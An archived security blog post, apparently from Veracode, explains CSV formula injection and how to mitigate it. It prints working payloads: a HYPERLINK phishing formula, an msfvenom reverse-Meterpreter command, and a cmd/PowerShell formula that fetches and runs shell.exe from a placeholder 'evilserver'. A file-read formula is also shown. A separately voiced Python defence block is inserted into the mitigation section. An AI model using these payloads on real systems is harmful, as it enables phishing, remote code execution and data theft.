securityboulevard.com
2606:4700:10::ac43:f6b
URL: http://securityboulevard.com/2019/09/data-extraction-to-command-execution-csv-injection/
Submission: On February 24 via manual from US — Scanned from DE
DATA EXTRACTION TO COMMAND EXECUTION CSV INJECTION

by jrougvie@veracode.com (jrougvie) on September 6, 2019

As web applications get more complex and more data driven, the ability to extract data from a web application is becoming more common. I work as a principal penetration tester on Veracode’s MPT team, and the majority of web applications that we test nowadays have the ability to extract data in a CSV format. The most common software installed in corporate environments is Microsoft Excel, and this software has the ability to open CSV files (in most cases, this is the default).
It should be noted that this type of attack would also affect LibreOffice, as it would also interpret the payload as a formula.

ATTACK REQUIREMENTS

In order to perform a basic attack, a number of requirements are needed. An attacker needs the ability to inject a payload into the tables within the application. The application needs to allow a victim to download this data in CSV format that can then be opened in Excel. This would cause the payload to be interpreted as an Excel formula and run.

BASIC ATTACK

1. Search the application to find a location where any data input can be extracted.

[FIGURE1.PNG]

2. Inject the payload:

=HYPERLINK("http://www.veracode.com", "Click for Report")

[FIGURE2.PNG]

3. Confirm the application is vulnerable to this type of attack. Extract the data and confirm the payload has been injected by opening the CSV file in Microsoft Excel.

[FIGURE3.PNG]

4. You can then see a “Click for Report” link in the Excel file. This indicates the payload has been injected correctly.

[FIGURE4.PNG]

In this scenario, when the victim clicks on the link, it will take them to the Veracode website. This type of attack might not seem too serious, but consider the following: instead of redirecting an end user to the Veracode website, we could redirect the end user to a server we controlled, which contained a clone of the website. We could then ask the victim to authenticate to our clone website, allowing us as the attacker to steal his or her credentials. We could then use these credentials on the original website and have access to all his or her personal information or any functionality the account has access to.

There are also a number of other attacks possible with this type of formula injection, including exfiltrating sensitive data, obtaining remote code execution, or even reading the contents of certain files under the right circumstances. We can look at one of these types of attacks below.
ADVANCED ATTACK – REMOTE COMMAND EXECUTION

A more advanced attack would use the same method as above but with a different payload, which would lead to remote code execution. This type of attack does depend on a number of factors and might not always be possible. However, it’s still worth considering, and it also highlights how serious this vulnerability can be under the right circumstances.

ATTACK IN STEPS

1. We’ll use a shell.exe file, which can contain whatever we want to execute on the system, but in this scenario we will use msfvenom to create a reverse Meterpreter payload.

msfvenom -p windows/meterpreter/reverse_tcp -a x64 --platform Windows LHOST=<IP Address> LPORT=1234 -f exe > shell.exe

2. We also need to set up a listener that will wait for the connect-back once the shell.exe payload has been executed on the victim’s machine. We will use Metasploit multi/handler for this example. We need to set the LPORT and also make sure the IP address is correct.

[FIGURE5.PNG]

3. We also need to host the shell.exe payload so it can be downloaded. For this, I used the following command, python -m SimpleHTTPServer 1337, which will set up a simple web server in the current directory on my system. A real attack might host this on a compromised web server.

4. Once all this has been set up, we could then inject the payload into the application and wait for a victim to download the CSV file and click on the cell with the payload in it.

=cmd|' /C powershell Invoke-WebRequest "http://evilserver:1337/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1

BREAKDOWN OF PAYLOAD

* The first line is calling cmd, which gets passed to the PowerShell Invoke-WebRequest to download a shell.exe file from our evilserver on port 1337. Note that if the host is running PowerShell version 2, Invoke-WebRequest won’t work.
* The next line is saving the shell.exe file into the temp directory.
The reason we use the temp directory is because it’s a folder anyone can write to.
* We then start a process to execute the downloaded shell.exe payload.

5. Once the victim opens the file, the CSV injection payload would run. However, it may present a “Remote Data Not Accessible” warning. The chances are that most victims would think the file has come from a legitimate source and so they need to select yes to view the data. It should also be noted that in this scenario the Excel file is empty apart from our payload. In a real-world attack, the Excel file would be populated with information from the application.

6. Once the victim selects yes, within a few moments, Metasploit will get a reverse connect from the victim’s host.

[FIGURE6.PNG]

7. At this point, the attacker can perform a number of tasks depending on the level of access he or she has obtained. This includes, but is not limited to, stealing passwords in memory, attacking other systems in the network (if this host is connected to a network), taking over users’ webcams, etc. In fact, under the right circumstances, it would be possible to compromise an entire domain using this attack.

When testing for CSV injection, in most instances a tester will use a simple payload, for a number of reasons. It’s not uncommon for a tester to demonstrate this type of attack by using a HYPERLINK payload like the one above, or a simple cmd payload like the following:

=cmd|'/C cmd.exe '!'A

Some might also use the following payload, depending on the operating system:

='file://etc/passwd'#$passwd.A1

This would read the first line of the /etc/passwd file on a Linux system.

MITIGATING THE RISK

The best way to mitigate against this type of attack is to make sure all user input is filtered so only expected characters are allowed. Client-supplied input should always be considered unsafe and treated with caution when processing.
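The two controls this section recommends, default-deny validation of submitted input and making sure exported cells cannot begin with the formula characters = + - @, as an added Python example (this is not the article's or Veracode's code). It assumes an export built with Python's standard csv module; the NAME_ALLOWLIST pattern, the sample rows and the inclusion of tab and carriage return among the trigger characters are my own choices. On the export side it prefixes a flagged cell with a single quote rather than deleting the leading character, so a legitimate value such as a phone number starting with + survives intact, and it adds a checker that scans an existing CSV for cells a spreadsheet would evaluate, which is handy when reviewing an export before it ships or when confirming a fix.

```python
"""Two-layer defence against CSV / formula injection.

Added example, not the article's or Veracode's code.
Layer 1 (input):  default-deny validation when data is submitted to the application.
Layer 2 (output): neutralise any cell a spreadsheet would evaluate when the CSV is built,
so that anything which slipped past layer 1, and legitimate values such as "+1 555 0100",
are displayed as text instead of being run as a formula in Excel or LibreOffice.
"""
import csv
import io
import re

# Leading characters that Excel / LibreOffice treat as the start of a formula.
# The article names = + - @ ; tab and carriage return are added here as an assumption,
# since some spreadsheet importers also honour them as cell control characters.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Assumed allow-list for a free-text "name" field: letters, digits, space and a few
# punctuation characters, at most 64 characters. Anything else is rejected outright.
NAME_ALLOWLIST = re.compile(r"[A-Za-z0-9 .,'\-]{0,64}")


def validate_input(value: str, allowlist: re.Pattern = NAME_ALLOWLIST) -> bool:
    """Layer 1: True only if the value matches the allow-list and cannot start a formula."""
    if allowlist.fullmatch(value) is None:
        return False
    return not value.startswith(FORMULA_TRIGGERS)


def is_formula_like(cell: str) -> bool:
    """True if a spreadsheet would evaluate this cell rather than display it.
    Leading spaces are ignored conservatively: a false positive only adds a quote."""
    return cell.lstrip(" ").startswith(FORMULA_TRIGGERS)


def neutralize_cell(cell: str) -> str:
    """Layer 2: prefix a single quote so the cell is rendered as literal text.
    Unlike stripping the first character, this keeps the data (e.g. "+44 ...") intact."""
    return "'" + cell if is_formula_like(cell) else cell


def export_csv(rows) -> str:
    """Build CSV text with every cell neutralised and quoted (embedded quotes are doubled)."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(str(cell)) for cell in row])
    return buf.getvalue()


def export_csv_naive(rows) -> str:
    """The unprotected export the article exploits: values written exactly as stored."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    for row in rows:
        writer.writerow([str(cell) for cell in row])
    return buf.getvalue()


def find_formula_cells(csv_text: str):
    """Review check: (row, column, value) for every cell in a CSV that would be evaluated."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if is_formula_like(cell):
                hits.append((r, c, cell))
    return hits


# Constructed sample data: a header, a benign customer whose phone starts with "+",
# and a record whose name field carries the HYPERLINK payload from the article.
SAMPLE_ROWS = [
    ["name", "phone", "notes"],
    ["Alice Smith", "+1 555 0100", "regular customer"],
    ['=HYPERLINK("http://www.veracode.com", "Click for Report")', "555 0101", "-"],
]

if __name__ == "__main__":
    for name in ("Alice Smith", SAMPLE_ROWS[2][0]):
        print(f"validate_input({name!r}) -> {validate_input(name)}")
    print("naive export flags:", find_formula_cells(export_csv_naive(SAMPLE_ROWS)))
    print("hardened export flags:", find_formula_cells(export_csv(SAMPLE_ROWS)))
    print(export_csv(SAMPLE_ROWS))
```

The single-quote prefix is a rendering hint that Excel and LibreOffice honour, but it is still visible in a plain-text editor and in some other consumers of the file, so keep the input-side allow-list as the primary control and treat the export step as the backstop for data that was stored before validation was tightened.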
CSV injection is a side effect of weak input validation, as are other types of web attacks. To mitigate against CSV injection, a default-deny or “whitelist” regular expression should be used to filter all data that is submitted to the application. Because Excel and CSV files use equals signs (=), plus signs (+), minus signs (-), and “at” symbols (@) to denote formulas, we recommend filtering these out to ensure no cells begin with these characters. Any element that could appear in a report could be a target for Excel / CSV injection and should be further validated for CSV injection.

In summary, CSV injection is not a new attack vector, but it’s one that developers often forget about. As more web applications have the ability to extract data, it’s one that could have serious consequences if steps are not taken to mitigate the risk it poses. In addition, developers should be checking user input for other types of attacks like XSS.

*** This is a Security Bloggers Network syndicated blog from RSS | Veracode Blog authored by jrougvie@veracode.com (jrougvie). Read the original post at: http://www.veracode.com/blog/secure-development/data-extraction-command-execution-csv-injection